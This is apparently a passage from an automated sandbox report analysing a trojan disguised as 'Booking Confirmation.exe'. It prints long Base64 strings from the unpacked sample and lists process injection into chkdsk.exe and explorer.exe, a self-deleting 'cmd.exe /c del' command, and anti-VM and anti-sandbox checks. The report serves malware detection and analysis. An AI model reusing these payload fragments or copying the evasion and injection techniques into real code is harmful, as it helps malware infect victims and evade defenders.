NNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
            Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, LogIn.csBase64 encoded string: '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
            Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, LogIn.csBase64 encoded string: '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
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@4/3
            Source: C:\Users\user\Desktop\Booking Confirmation.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Booking Confirmation.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
            Source: C:\Users\user\Desktop\Booking Confirmation.exeMutant created: \Sessions\1\BaseNamedObjects\YvCWoKEDmRL
            Source: Booking Confirmation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Booking Confirmation.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\Booking Confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: Booking Confirmation.exeReversingLabs: Detection: 33%
            Source: unknownProcess created: C:\Users\user\Desktop\Booking Confirmation.exe 'C:\Users\user\Desktop\Booking Confirmation.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
            Source: unknownProcess created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'
            Source: C:\Users\user\Desktop\Booking Confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Users\user\Desktop\Booking Confirmation.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Booking Confirmation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Booking Confirmation.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: chkdsk.pdbGCTL source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: chkdsk.pdb source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Booking Confirmation.exe, chkdsk.exe
            Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Booking Confirmation.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00417867 push edx; retf
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041B124 push 423E369Ah; iretd
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00416625 push ds; retf
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041CEB5 push eax; ret
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041CF6C push eax; ret
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041DF6E push ds; ret
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041CF02 push eax; ret
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041CF0B push eax; ret
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00410FA6 push ebx; ret
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018BD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D3D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04336625 push ds; retf
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433CEB5 push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433CF02 push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433CF0B push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433DF6E push ds; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433CF6C push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04330FA6 push ebx; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04337867 push edx; retf
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433B124 push 423E369Ah; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.4686220922

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Booking Confirmation.exe PID: 7100, type: MEMORY
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.26148e8.1.raw.unpack, type: UNPACKEDPE
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\Booking Confirmation.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\Booking Confirmation.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Booking Confirmation.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000043298E4 second address: 00000000043298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004329B5E second address: 0000000004329B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Booking Confirmation.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
            Source: C:\Users\user\Desktop\Booking Confirmation.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\Booking Confirmation.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\Booking Confirmation.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
            Source: C:\Users\user\Desktop\Booking Confirmation.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\Booking Confirmation.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Booking Confirmation.exe TID: 7104Thread sleep time: -100831s >= -30000s
            Source: C:\Users\user\Desktop\Booking Confirmation.exe TID: 7124Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 616Thread sleep count: 34 > 30
            Source: C:\Windows\explorer.exe TID: 616Thread sleep time: -68000s >= -30000s
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 3296Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: Booking Confirmation.exe, 00000000.00000002.677064945.0000000008A0D000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: explorer.exe, 00000006.00000000.697485272.000000000FC60000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000006.00000000.693819137.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
